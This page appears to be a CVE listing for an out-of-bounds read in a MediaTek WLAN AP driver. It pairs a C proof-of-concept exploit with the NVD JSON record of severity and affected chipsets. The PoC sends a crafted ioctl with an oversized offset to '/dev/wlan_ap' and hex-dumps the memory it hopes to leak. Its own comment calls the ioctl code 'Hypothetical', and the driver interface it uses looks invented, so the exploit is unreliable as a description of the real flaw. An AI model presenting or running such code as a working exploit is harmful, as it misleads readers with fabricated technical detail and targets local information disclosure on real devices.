CVE-2025-20724

# CVE-2025-20724 - MediaTek WLAN AP Driver Out-of-Bounds Read PoC # This PoC demonstrates the concept of triggering an out-of-bounds read # in the MediaTek WLAN AP driver through incorrect bounds checking. # Patch ID: WCNCR00418894; Issue ID: MSV-3475 # Note: Requires local user execution privileges on the target device. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/ioctl.h> #include <fcntl.h> // Define relevant WLAN driver interface constants #define WLAN_AP_DRIVER_DEVICE "/dev/wlan_ap" #define IOCTL_WLAN_AP_CMD 0x1001 // Hypothetical IOCTL command // Structure to simulate the vulnerable data buffer struct wlan_ap_request { unsigned int data_len; // Length of data buffer unsigned int offset; // Offset for read operation (not properly bounds-checked) char data[256]; // Data buffer }; int main(int argc, char *argv[]) { int fd; struct wlan_ap_request req; char leak_buffer[512]; // Buffer to capture leaked data printf("[*] CVE-2025-20724 PoC - MediaTek WLAN AP Driver OOB Read\n"); printf("[*] Patch ID: WCNCR00418894\n"); printf("[*] Issue ID: MSV-3475\n\n"); // Open the WLAN AP driver device fd = open(WLAN_AP_DRIVER_DEVICE, O_RDWR); if (fd < 0) { perror("[-] Failed to open WLAN AP driver device"); printf("[*] This PoC requires access to the MediaTek WLAN AP driver interface.\n"); return 1; } printf("[+] Opened WLAN AP driver device (fd=%d)\n", fd); // Prepare the malicious request // The vulnerability is triggered by providing an offset value that // exceeds the bounds of the internal data buffer, but the driver // fails to validate it properly. memset(&req, 0, sizeof(req)); req.data_len = 256; // Actual buffer size req.offset = 0xFFFF; // Out-of-bounds offset (not properly checked) memset(req.data, 'A', sizeof(req.data)); printf("[*] Sending crafted request with OOB offset: 0x%X\n", req.offset); // Send the malicious IOCTL request to trigger the OOB read // The driver will read beyond the allocated buffer due to // the incorrect bounds check on the offset field. if (ioctl(fd, IOCTL_WLAN_AP_CMD, &req) < 0) { perror("[-] IOCTL call failed"); } else { printf("[+] IOCTL call succeeded - potential OOB read triggered\n"); } // Attempt to read leaked data printf("[*] Attempting to read leaked memory contents...\n"); memset(leak_buffer, 0, sizeof(leak_buffer)); read(fd, leak_buffer, sizeof(leak_buffer)); // Display potential leaked data printf("[*] Leaked data (hex dump):\n"); for (int i = 0; i < sizeof(leak_buffer); i++) { printf("%02X ", (unsigned char)leak_buffer[i]); if ((i + 1) % 16 == 0) printf("\n"); } printf("\n"); close(fd); printf("[*] PoC execution completed.\n"); return 0; }

{"cve": {"id": "CVE-2025-20724", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:37.350", "lastModified": "2025-10-16T13:04:10.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In wlan AP driver, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00418894; Issue ID: MSV-3475."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mediatek:software_development_kit:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.6.7.2", "matchCriteriaId": "0DD86CC1-BD46-42D2-9112-190CCAC96B30"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6890:-:*:*:*:*:*:*:*", "matchCriteriaId": "171D1C08-F055-44C0-913C-AA2B73AF5B72"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7615:-:*:*:*:*:*:*:*", "matchCriteriaId": "05748BB1-0D48-4097-932E-E8E2E574FD8D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7622:-:*:*:*:*:*:*:*", "matchCriteriaId": "55EB4B27-6264-45BE-9A22-BE8418BB0C06"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7663:-:*:*:*:*:*:*:*", "matchCriteriaId": "10C79211-F064-499D-914E-0BACD038FBF4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7915:-:*:*:*:*:*:*:*", "matchCriteriaId": "3AB22996-9C22-4B6C-9E94-E4C055D16335"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7916:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD5AA441-5381-4179-89EB-1642120F72B4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7981:-:*:*:*:*:*:*:*", "matchCriteriaId": "490CD97B-021F-4350-AEE7-A2FA866D5889"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7986:-:*:*:*:*:*:*:*", "matchCriteriaId": "40A9E917-4B34-403F-B512-09EEBEA46811"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:19.07.0:-:*:*:*:*:*:*", "matchCriteriaId": "4FA469E2-9E63-4C9A-8EBA-10C8C870063A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:21.02.0:-:*:*:*:*:*:*", "matchCriteriaId": "F0133207-2EED-4625-854F-8DB7770D5BF7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6890:-:*:*:*:*:*:*:*", "matchCriteriaId": "171D1C08-F055-44C0-913C-AA2B73AF5B72"}]}]}], "references": [{"url": "https://corp.mediatek.com/product-security-bulletin/October-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}